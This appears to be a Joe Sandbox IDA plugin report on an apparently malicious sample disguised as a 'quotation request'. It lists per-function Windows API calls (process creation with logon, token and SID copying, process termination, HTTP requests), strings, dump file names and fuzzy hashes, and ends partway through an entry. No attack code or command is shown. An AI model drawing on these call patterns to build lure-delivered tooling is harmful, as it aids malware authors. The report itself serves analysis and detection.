Function 01028879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 010280A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 010280C0
Part of subcall function 010280A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 010280CA
Part of subcall function 010280A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 010280D9
Part of subcall function 010280A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 010280E0
Part of subcall function 010280A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 010280F6

GetLengthSid.ADVAPI32(?,00000000,0102842F), ref: 010288CA
GetProcessHeap.KERNEL32(00000008,00000000), ref: 010288D6
HeapAlloc.KERNEL32(00000000), ref: 010288DD
CopySid.ADVAPI32(00000000,00000000,?), ref: 010288F6
GetProcessHeap.KERNEL32(00000000,00000000,0102842F), ref: 0102890A
HeapFree.KERNEL32(00000000), ref: 01028911

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: 616d0a0256ba8ceeb59d8b3a6df092478997706a7169e1de0b52b850035bc335
Instruction ID: 7ca0b49190bded980b8d7d5c6ee24dea9729bc9aa07bae4f85e8c2fa902220f6
Opcode Fuzzy Hash: 616d0a0256ba8ceeb59d8b3a6df092478997706a7169e1de0b52b850035bc335
Instruction Fuzzy Hash: CC11AF3560121AFFEB649FA8DC09BBF7BE8EB45315F18805AE9C597100C73A9900CB60

Function 010285B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 010285E2
OpenProcessToken.ADVAPI32(00000000), ref: 010285E9
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 010285F8
CloseHandle.KERNEL32(00000004), ref: 01028603
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 01028632
DestroyEnvironmentBlock.USERENV(00000000), ref: 01028646

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 3d4e13d605e2513b47842e443bc073bade5e82a928c9709fc2bc455de11f4b05
Instruction ID: 560523f4970b63cc20d351cfae10734b79fecb82bcb6c4fd956592ab19bb82c4
Opcode Fuzzy Hash: 3d4e13d605e2513b47842e443bc073bade5e82a928c9709fc2bc455de11f4b05
Instruction Fuzzy Hash: 971159B650121EABEF218EA8DD49BDF7BE9EF08344F048055FE44A2160C37A9D60DB60

Function 0102B790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0102B7B5
GetDeviceCaps.GDI32(00000000,00000058), ref: 0102B7C6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 0102B7CD
ReleaseDC.USER32(00000000,00000000), ref: 0102B7D5
MulDiv.KERNEL32(000009EC,?,00000000), ref: 0102B7EC
MulDiv.KERNEL32(000009EC,?,?), ref: 0102B7FE

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 59c08fa19266d13ab2d0cea980f9bcefc0ffc165ab67a2d921bf94fc74133618
Instruction ID: 9bf7313f247807a8f7304e571bd484b84e98af68862d1c75b33c178889d073ea
Opcode Fuzzy Hash: 59c08fa19266d13ab2d0cea980f9bcefc0ffc165ab67a2d921bf94fc74133618
Instruction Fuzzy Hash: 65018475E00319BBEB109BB69C45A5FBFB8EB48351F044065FA44A7281D6359800CFA0

Function 00FF0162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FF0193
MapVirtualKeyW.USER32(00000010,00000000), ref: 00FF019B
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FF01A6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FF01B1
MapVirtualKeyW.USER32(00000011,00000000), ref: 00FF01B9
MapVirtualKeyW.USER32(00000012,00000000), ref: 00FF01C1

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: ef5e38f8294645aefff51316107adff7ee263bb50e3d98407b44493b92ea11c1
Instruction ID: 9d2863c7842b2ffdd4a12c4b087c20dec97d51d9a8b70a8514c0030e70835d4e
Opcode Fuzzy Hash: ef5e38f8294645aefff51316107adff7ee263bb50e3d98407b44493b92ea11c1
Instruction Fuzzy Hash: 110148B090175A7DE3009F6A8C85A52FEA8FF19354F00411BA15847941C7B5A864CBE5

Function 010353E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 010353F9
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0103540F
GetWindowThreadProcessId.USER32(?,?), ref: 0103541E
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0103542D
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 01035437
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0103543E

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 6e7461cfb14f4b1a153350a1eadc2ecbc987d99258159fd3d3ef4a4646d1327a
Instruction ID: db8b0933b08d89c66498dfdb7d84217b0a15f458c271565aafc3ca110830b373
Opcode Fuzzy Hash: 6e7461cfb14f4b1a153350a1eadc2ecbc987d99258159fd3d3ef4a4646d1327a
Instruction Fuzzy Hash: 4BF01D32241259BBE7315AA29C0DEAB7B7CEBCAB15F000159FA44D20519AAA1A0187B5

Function 01037230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 01037243
EnterCriticalSection.KERNEL32(?,?,00FE0EE4,?,?), ref: 01037254
TerminateThread.KERNEL32(00000000,000001F6,?,00FE0EE4,?,?), ref: 01037261
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00FE0EE4,?,?), ref: 0103726E

Part of subcall function 01036C35: CloseHandle.KERNEL32(00000000,?,0103727B,?,00FE0EE4,?,?), ref: 01036C3F

InterlockedExchange.KERNEL32(?,000001F6), ref: 01037281
LeaveCriticalSection.KERNEL32(?,?,00FE0EE4,?,?), ref: 01037288

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 5d61cac1c30909017ac1af881d620aa05a33713d9ad35bd076a0d6b2c7dc1b31
Instruction ID: 63e230f0997f42f2ad39bf5b4a9028c6664fa8b00912a2c434c25fae54a07049
Opcode Fuzzy Hash: 5d61cac1c30909017ac1af881d620aa05a33713d9ad35bd076a0d6b2c7dc1b31
Instruction Fuzzy Hash: D3F0BEBA441303EBEB622B24EC4C9EB3B29EF45342B100121F28390098CB7F1400CB50

Function 01028992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0102899D
UnloadUserProfile.USERENV(?,?), ref: 010289A9
CloseHandle.KERNEL32(?), ref: 010289B2
CloseHandle.KERNEL32(?), ref: 010289BA
GetProcessHeap.KERNEL32(00000000,?), ref: 010289C3
HeapFree.KERNEL32(00000000), ref: 010289CA

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 5db9dd7650ca3f730a794d2d9a3c548d5fab427116b71ac7eefa5dffdfbe9140
Instruction ID: 98544c014540e945cd451b851dfb580cc5fa18790a32b4aab01968378965ebd5
Opcode Fuzzy Hash: 5db9dd7650ca3f730a794d2d9a3c548d5fab427116b71ac7eefa5dffdfbe9140
Instruction Fuzzy Hash: 9BE0E536004206BBDB112FE1EC0C90BBF79FF8A322B108220F259C1468CB3FA420DB54

Function 010485ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 01048613
CharUpperBuffW.USER32(?,?), ref: 01048722
VariantClear.OLEAUT32(?), ref: 0104889A

Part of subcall function 01037562: VariantInit.OLEAUT32(00000000), ref: 010375A2
Part of subcall function 01037562: VariantCopy.OLEAUT32(00000000,?), ref: 010375AB
Part of subcall function 01037562: VariantClear.OLEAUT32(00000000), ref: 010375B7

Strings

AUTOIT.ERROR, xrefs: 01048728
Incorrect Parameter format, xrefs: 0104864B, 0104880D

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 4e14008a1cab2e7c91cc90cc4f025821ccbdc7ea2b6a98b9d14beb652d463571
Instruction ID: c125cafec0ccabeed0a317757ed134fb1511c8cfc14c7ef80dca032c000b06f5
Opcode Fuzzy Hash: 4e14008a1cab2e7c91cc90cc4f025821ccbdc7ea2b6a98b9d14beb652d463571
Instruction Fuzzy Hash: D4919EB16083019FC750EF68C48495ABBE5FF89714F088D6EF98A8B361DB35E905CB52

Function 01032A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FEFC86: _wcscpy.LIBCMT ref: 00FEFCA9

_memset.LIBCMT ref: 01032B87
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 01032BB6
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 01032C69
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 01032C97

Strings

0, xrefs: 01032B73

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 0e9541ef0f10fdd2c7c03e7763db305e400e39f1ce257e2676863618e8745cab
Instruction ID: 027c374588869be0143d9bd327b324d55a893b29247eabb86c70f1c79d002e90
Opcode Fuzzy Hash: 0e9541ef0f10fdd2c7c03e7763db305e400e39f1ce257e2676863618e8745cab
Instruction Fuzzy Hash: 5E5100715183099BE765DE68C844A6BBBECEFC5310F040A6EFAC4D72A1DB74C904D752

Function 0102D56C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0102D5D4
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0102D60A
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0102D61B
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0102D69D

Strings

DllGetClassObject, xrefs: 0102D610

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: f08c9ee280b379143f08e044ff774c709464a9350c53b59c8bb2e16e433d6773
Instruction ID: 18006bafaa023195fc6a82ac04e39d8277290fb627bf0ba36f6167f4dd9afa52
Opcode Fuzzy Hash: f08c9ee280b379143f08e044ff774c709464a9350c53b59c8bb2e16e433d6773
Instruction Fuzzy Hash: 2441C3B1600215EFDB25DF94C888A9A7BBAEF48310F1180ADED49DF205D7B5DD44CBA0

Function 01032753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 010327C0
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 010327DC
DeleteMenu.USER32(?,00000007,00000000), ref: 01032822
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,01095890,00000000), ref: 0103286B

Strings

0, xrefs: 010327B5

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 2a7ad69602d81f97dd281d76ce29cff4e31fdfe81021f547f49ad276bcfa809e
Instruction ID: dc2d34d20a1ea4a6e56515f7f2d89621abfd5971d0bcc1f4c99e1bfd65f6004b
Opcode Fuzzy Hash: 2a7ad69602d81f97dd281d76ce29cff4e31fdfe81021f547f49ad276bcfa809e
Instruction Fuzzy Hash: 0341B0702053029FD720DF28C844B6ABBE9EFC5314F14496EFAE697291D734E905CB52

Function 0104D7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0104D7C5

Part of subcall function 00FD784B: _memmove.LIBCMT ref: 00FD7899

Strings

none, xrefs: 0104D8A0
winapi, xrefs: 0104D836
stdcall, xrefs: 0104D847
cdecl, xrefs: 0104D81C

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: 5405f0eea5df81b194e58c892de67b71c9267eaf48a29d12207048735b2b2be6
Instruction ID: 7b3a2d67ad2c287cdb5b3eec034e32faf4d96e21aa1f7a3be183adff3b769f30
Opcode Fuzzy Hash: 5405f0eea5df81b194e58c892de67b71c9267eaf48a29d12207048735b2b2be6
Instruction Fuzzy Hash: 8131C5705046199BDF00EF98CC919FEB3B5FF14320B10866AE8A9977D2DB35E905CB80

Function 01028E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FD7DE1: _memmove.LIBCMT ref: 00FD7E22

Part of subcall function 0102AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0102AABC

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 01028F14
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 01028F27
SendMessageW.USER32(?,00000189,?,00000000), ref: 01028F57

Part of subcall function 00FD7BCC: _memmove.LIBCMT ref: 00FD7C06

Strings

ComboBox, xrefs: 01028E9E
ListBox, xrefs: 01028ED3

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: d111cfa9a4ee5d8503134a1459d088bf31d50ff71b26c823cd79e9e497f7087e
Instruction ID: 3c00d37b282267b6ebce801be18b80aaf3de30b9d562d90f8acf993e07d9e452
Opcode Fuzzy Hash: d111cfa9a4ee5d8503134a1459d088bf31d50ff71b26c823cd79e9e497f7087e
Instruction Fuzzy Hash: 5F21F875A04205BEDB54ABB4CC45CFFB7AADF45360F04851BF591572E1DB3D48099620

Function 0104182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0104184C
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 01041872
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 010418A2
InternetCloseHandle.WININET(00000000), ref: 010418E9

Part of subcall function 01042483: GetLastError.KERNEL32(?,?,01041817,00000000,00000000,00000001), ref: 01042498
Part of subcall function 01042483: SetEvent.KERNEL32(?,?,01041817,00000000,00000000,00000001), ref: 010424AD

Strings

, xrefs: 01041893

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 434dfe2a9b7bd064b7320b60f0ea0d54a83a3856585ce817b34492ea4d0c73a0
Instruction ID: 921475e60e517da7455000d619c7eeb3cb73d5642d7f8e8de2d3810cd2fed77b
Opcode Fuzzy Hash: 434dfe2a9b7bd064b7320b60f0ea0d54a83a3856585ce817b34492ea4d0c73a0
Instruction Fuzzy Hash: 9A217FB1600309BFFB119A64DCC4EBF7BEDEB88644F00413EF585D6140EA79AD4597A1

Function 010563E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00FD1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00FD1D73
Part of subcall function 00FD1D35: GetStockObject.GDI32(00000011), ref: 00FD1D87
Part of subcall function 00FD1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FD1D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 01056461
LoadLibraryW.KERNEL32(?), ref: 01056468
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0105647D
DestroyWindow.USER32(?), ref: 01056485

Strings

SysAnimate32, xrefs: 0105643C

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096274085.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096299607.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_QUOTATION REQUEST - BQS058.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 825494e17fec1fbc25ac633d7dc6bb1b654b510b1af64a11e96ef04740effa25
Instruction ID: fd6915a31538fa90696e208d727eff65f3909f0961e5890a6ec05947c8965485
Opcode Fuzzy Hash: 825494e17fec1fbc25ac633d7dc6bb1b654b510b1af64a11e96ef04740effa25
Instruction Fuzzy Hash: 5C21C271100205BFEF914E68DC50EBB7BEEEB48364F904629FE9093192CB36DC419B20

Function 01036D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 01036DBC
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 01036DEF
GetStdHandle.KERNEL32(0000000C), ref: 01036E01
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 01036E3B

Strings

nul, xrefs: 01036E36

Memory Dump Source

Source File: 00000000.00000002.2096104023.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.2096081940.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096209897.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
